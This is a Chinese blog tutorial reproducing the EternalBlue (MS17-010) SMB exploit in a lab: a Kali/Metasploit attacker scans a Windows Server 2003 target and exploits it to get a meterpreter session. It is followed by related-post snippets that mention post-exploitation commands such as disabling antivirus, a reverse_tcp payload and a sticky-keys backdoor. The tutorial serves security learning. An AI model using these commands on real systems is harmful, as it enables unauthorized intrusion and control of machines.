CVE-2017-0144 “永恒之蓝” 漏洞复现

已于 2024-08-09 19:16:17 修改
阅读量337 收藏 7
点赞数 6
文章标签: 网络安全 系统安全 安全 网络攻击模型 安全威胁分析
于 2024-08-08 17:38:39 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/cxm4545/article/details/140997717
版权

一.简介

CVE-2017-0144 即永恒之蓝,最早爆发于2017年4月14日晚,它是在Windows系统的SMB服务处理SMB v1请求时发生的漏洞,这个漏洞导致攻击者在目标系统上获取了最高权限,可以执行任意代码。通过永恒之蓝漏洞会扫描开放445文件共享端口的Windows机器,无需用户任何操作,只要开机上网,不法分子就能在电脑和服务器中植入勒索软件、远程控制木马、虚拟货币挖矿机等恶意程序。

二.环境准备

靶机:Windows Server 2003 

攻击机:Kali (自带 Metasploit)

三.复现过程

1. 关闭靶机的防火墙。(这里我的Windows版本可能跟你不同,但是位置一般差不多,在设置里搜索一下就可以找到)

2. 开启靶机的SMB服务(网上邻居 -> 属性)

点击 高级 -> 选择 高级设置 -> 开启 文件和打印机共享。(不同版本略有区别,一般都在 高级共享设置 里可以找到)

3. 开启 Kali ,输入命令 msfconsole ,启动 Metasploit 。

4.  输入命令,查看一下有关 永恒之蓝 漏洞的模块。

search ms17_010

有四个模块,前两个是漏洞利用模块,后两个是辅助模块,用于扫描漏洞。

5. 我们使用最后一个,先确定一下靶机是否存在永恒之蓝漏洞。

use auxiliary/scanner/smb/smb_ms17_010

6. 输入命令 options ,查看一下需要设置哪些参数,yes 表示需要我们自己设置,(有默认参数时可以不设置,也可以选择自己修改),no 表示不需要我们自己设置。

这里我们只需要设置 RHOSTS ,另外三个我们就不设置了,默认当前的设置就可以了。

7. RHOSTS 可以是一个确定的 ip 地址,也可以是一个 ip 地址的范围,如果确定了靶机的 ip 地址,就直接扫描一个确定的地址就可以了。

首先,在靶机上看一下 ip 地址是多少,输入命令 ipconfig 。

然后,就开始设置,在 Kali 上输入命令设置 RHOSTS 参数。

set rhosts 靶机的ip地址

8. 输入 run ,开始扫描。(有绿色标识符就说明有这个漏洞可以利用)

9. 进入漏洞利用模块,也就是刚刚搜索出来的四个模块,我们先用第一个模块来试试。

use exploit/windows/smb/ms17_010_eternalblue

然后 查看参数。

10. 这里跟上面一样,只需要设置 RHOSTS 。

11. 输入 run 。发现型号不匹配,没关系,换第二个模块。

12. 操作同上。到此为止,我们就拿到 meterpreter ,说明漏洞利用成功了。

13. 我们已经控制了靶机,接着就可以执行我们想要的任何命令了。

Min._.
关注
[渗透测试笔记] 28.复现CVE-2017-0146(永恒之蓝)
H4ppyD0g的博客
02-06 3272
所有内容仅作为个人学习和实验使用,请勿用于非法用途,后果自负! 第一次复现漏洞,感觉好好玩 ???? 永恒之蓝编号CVE-2017-0146,可通过MS17-010补丁修补此漏洞 CVE可以看成一个漏洞字典,用来给广泛认同的信息安全漏洞等提供一个公共的名称。通过使用同一个名称,可以在各自独立的漏洞库中起到一定的兼容性效果,并帮助在各个漏洞库中找到相关修补信息。 MS17-010是微软的一个安全类型的补...
漏洞复现永恒之蓝 MS17-010 远程溢出漏洞(CVE-2017-0143)
做自己喜欢的事,并将其发挥到极致!
03-07 8358
文章目录声明前言一、漏洞原理简述二、漏洞代码深层解析三、实验步骤四、漏洞补丁总结 声明 本篇文章仅用于技术研究与技术学习,切勿用于非授权下攻击行为,切记! 前言 Windows7 存在 MS17-010 永恒之蓝(远程溢出漏洞) ,该漏洞是方程式组织在其漏洞利用框架中一个针对SMB服务进行攻击的漏洞,该漏洞导致攻击者在目标系统上可以执行任意代码 一、漏洞原理简述 MS17-010漏洞出现在Windows SMB v1中的内核态函数 srv!SrvOs2FeaListToNt 在处理FEA(File Ex
使用Metasploit渗透攻击windows系统(二)
weixin_30457465的博客
01-27 666
后渗透攻击: 介绍常用的一些命令: 查看进程:ps 查看当前进程号:getpid 查看系统信息:sysinfo 查看目标机是否为虚拟机:run post/windows/gather/checkvm 查看完整网络设置:route 查看当前权限:getuid 自动提权:getsystem 关闭杀毒软件:run post/windows/manage/killav 启动...
ms17_010(永恒之蓝漏洞复现详细教程
zxcvbnmasdflzl的博客
06-25 594
set payload windows/x64/meterpreter/reverse_tcp //设置攻击载体(简单来说就是,如果不使用这个模块,攻击成功之后,就是一个简单的shell,使用这个载体,攻击成功之后可以使用这个模块自带的各种攻击模块(强大到想流泪的功能模块))。首先使用 nmap 命令扫描局域网内的所有主机(因为ms17_010漏洞的最基本要求是需要开启445端口),这里使用nmap的最基本的扫描,直接命令后跟ip,nmap 192.168.1.1/24(扫描整个局域网的意思)。
漏洞复现_CVE-2017-0144永恒之蓝漏洞
qq_51550750的博客
06-02 3156
漏洞复现_CVE-2017-0144永恒之蓝漏洞
CVE-2017-0144 EternalBlue(永恒之蓝漏洞分析
子曰小玖的博客
04-08 7047
前言 EternalBlue(永恒之蓝)据称是方程式组织在其漏洞利用框架中一个针对SMB服务进行攻击的模块,由于其涉及漏洞的影响广泛性及利用稳定性,在被公开以后为破坏性巨大的勒索蠕虫 WannaCry所用而名噪一时。360威胁情报中心对于WannaCry的活动持续地进行着监控,我们看到的趋势是 WannaCry的感染量还在增加,说明作为蠕虫主要传播手段的EternalBlue相应的漏洞还大量存在...
CVE-2017-0144 (Windows server 2008系列缓冲区溢出漏洞
Fly_鹏程万里
03-15 8590
漏洞原理srv.sys在处理SrvOs2FeaListSizeToNt的时候逻辑不正确导致越界拷贝。我们首先看下漏洞的触发点:unsigned int __fastcall SrvOs2FeaToNt(int a1, int a2) {   int v4; // edi@1   _BYTE *v5; // edi@1   unsigned int result; // eax@1   v4 = a...
WannaCry勒索软件(CVE-2017-0144
HaSaKing的博客
05-28 341
2017年5月,WannaCry勒索软件爆发了一场全球性的网络安全危机,迅速感染了超过200,000台计算机,波及150多个国家。从医疗保健系统到政府机构,无数组织面临数据被加密和赎金要求的双重威胁。本文将提供关于WannaCry勒索软件的详尽分析,包括其工作原理、传播机制和防御策略,旨在提升公众对此类网络威胁的认识和应对能力。
三、漏洞编号为CVE-2017-7494的复现永恒之蓝)(Linux)(Ubuntu16.04.4)
qwsn
10-15 4142
一、漏洞分析 1.漏洞别名: CVE-2017-7494称为Linux版的永恒之蓝 2.漏洞用来做什么: 该漏洞用来,远程反弹shell并提权 3.漏洞适合的环境: Samba 3.5.0到4.6.4/4.5.10/4.4.14的中间版本。 //也就是Samba 3.5.0之后的所有版本,在4.6.4/4.5.10/4.4.14修复了这个漏洞。 二、漏洞环境复现 1.相关信息: ①IP地址...
2024年[永恒之蓝]实战-漏洞复现_永恒之蓝漏洞复现实验(1),2024年最新网络安全中高级面试必知必会
m0_60691292的博客
05-05 655
在实际的渗透测试过程中,面对复杂多变的网络环境,当常用工具不能满足实际需求的时候,往往需要对现有工具进行扩展,或者编写符合我们要求的工具、自动化脚本,这个时候就需要具备一定的编程能力。恭喜你,如果学到这里,你基本可以从事一份网络安全相关的工作,比如渗透测试、Web 渗透、安全服务、安全分析等岗位;8、显示meterpreter,我们已经所渗透成功了,现在我们已经拿到目标机的Shell了。3、我们在第二步的时候使用的是auxiliary模块进行的漏洞检测,这回我们使用exploit模块进行漏洞利用。
CVE-2019-0708(远程桌面)漏洞复现
weixin_43806577的博客
08-26 5539
一、CVE-2019-0708漏洞简介 CVE-2019-0708漏洞被称为“永恒之蓝”级别的漏洞,只要开启Windows远程桌面服务(RDP服务)即可被攻击。 二、测试环境 Kali虚拟机、Windows Server 2008 R2 64位(Windows服务器需开启远程桌面服务)、windows 7 64位(开启远程桌面服务) 三、测试过程 (1)查看IP Kali的IP地址为1...
msf复现利用永恒之蓝【MS17_010】CVE-2017-0144漏洞
qq_58873970的博客
07-28 449
SMB是一个协议服务器信息块,它是一种客户机/服务器、请求/响应协议,通过SMB协议可以在计算机间共享文件、打印机、命名管道等资源,电脑上的网上邻居就是靠SMB实现的;SMB协议工作在应用层和会话层,可以用在TCP/IP协议之上,SMB使用TCP139端口和TCP445端口。漏洞复现是一个排错的过程,要善于利用互联网这个工具进行排难。
永恒之蓝漏洞CVE-2017-0144复现
LRainner的博客
03-04 4614
永恒之蓝漏洞CVE-2017-0144复现 环境搭建 一台kali攻击机 一台windows7靶机 信息收集 ifconfig 查看kali的ip地址为192.168.125.25 使用nmap扫描192.168.125.0网段下存活的主机 nmap 192.168.125.25/24 判断靶机ip地址为192.168.125.151 nmap -O 192.168.125.151 判断靶机为Windows 7|2008|8.1 使用永恒之蓝进行攻击 msfconsole进入metasploit控
MS17-010(Eternal blue永恒之蓝漏洞利用+修复方法
最新发布
qq_57163799的博客
08-22 1400
永恒之蓝漏洞的利用方法结合msf工具的使用,简单快速理解永恒之蓝!!!
ms17-010(永恒之蓝漏洞复现与处理
热门推荐
diaobusi的博客
06-05 1万+
ms17_010 是一种操作系统漏洞,仅影响 Windows 系统中的 SMBv1 服务。这个漏洞是由于 SMBv1 内核函数中的缓冲区溢出而导致的。攻击者可以通过该漏洞控制目标系统,并执行任意代码。这个漏洞通过 445 文件共享端口进行利用,一旦攻击者成功利用该漏洞,就可以在目标主机上植入各种恶意软件,如勒索软件。最近出现的 WannaCry 勒索软件就使用 ms17_010 漏洞来传播和植入勒索代码,将目标系统中的所有文件加密并威胁用户付款。
永恒之蓝漏洞简单复现
weixin_71397119的博客
04-24 612
MS17-010是指微软在2017年发布的一个安全公告,其中公开了一个严重的漏洞,被称为永恒之蓝(EternalBlue)漏洞。这个漏洞影响了微软Windows操作系统中的SMB协议(Server Message Block,服务器消息块),它是一种用于文件和打印机共享的通信协议。该漏洞会扫描开放的445端口(文件共享端口),无需用户的交互,只要用户开机上网,攻击者就能进行攻击。攻击者可以利用永恒之蓝漏洞通过网络向受感染的计算机发送恶意代码,从而实施各种攻击,包括勒索软件、间谍软件以及其他类型的恶意软件。
win7四大基础漏洞复现(死亡蓝屏,构造payload,永恒之蓝shift5),以及修复方案
xt350488的博客
06-20 1554
简单理解,用来生成后门的软件。当用户连续按下5次Shift键时,正常情况下,系统会启动一个名为“粘滞键”(Sticky Keys)的辅助功能,其对应的程序是sethc.exe,位于C:\Windows\System32\目录下。然而,在某些未打补丁的Windows 7(SP1)系统上,攻击者可以通过替换或修改sethc.exe文件,使其指向其他程序,如命令提示符(cmd.exe)。一旦sethc.exe被替换,当用户再次连续按下5次Shift键时,就会启动命令提示符,而不是粘滞键。
网络安全必学渗透测试流程
qq_44005305的博客
02-12 617
无论你是去B站或者是油管上面都有很多网络安全的相关视频可以学习,当然如果你还不知道选择那套学习,我这里也整理了一套和上述成长路线图挂钩的视频教程,完整版的视频已经上传至CSDN官方,朋友们如果需要可以点击这个链接免费领取。3、我们在第二步的时候使用的是auxiliary模块进行的漏洞检测,这回我们使用exploit模块进行漏洞利用。2、这里我们先选择#1的auxiliary(辅助模块)先进行踩点,查看漏洞是否可以利用,再去进行渗透攻击。1、第二步骤的时候检测到目标存在该漏洞,现在我们开始进行渗透。
CVE-2017-0144
01-16
CVE-2017-0144,也被称为“永恒之蓝漏洞,是一种影响Windows操作系统的缓冲区溢出漏洞。该漏洞允许远程攻击者在目标系统上执行任意代码,从而获取系统的完全控制权限。 该漏洞的利用方式是通过发送特制的SMB(Server Message Block)请求到目标系统上的SMB服务,从而触发缓冲区溢出。攻击者可以利用这个漏洞来执行恶意代码,获取系统的敏感信息,或者在目标系统上进行其他恶意活动。 为了防止受到CVE-2017-0144漏洞的攻击,建议您采取以下措施: 1. 及时更新操作系统:确保您的Windows操作系统已经安装了最新的安全补丁和更新。 2. 启用防火墙:配置和启用防火墙,限制对SMB服务的访问。 3. 禁用SMBv1:由于CVE-0144主要影响SMBv1协议,建议禁用SMBv1以减少受攻击的风险。 4. 使用网络隔离措施:将受影响的系统与其他系统隔离,以防止漏洞的传播。 5. 安装安全软件:使用可靠的安全软件来检测和阻止恶意活动。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值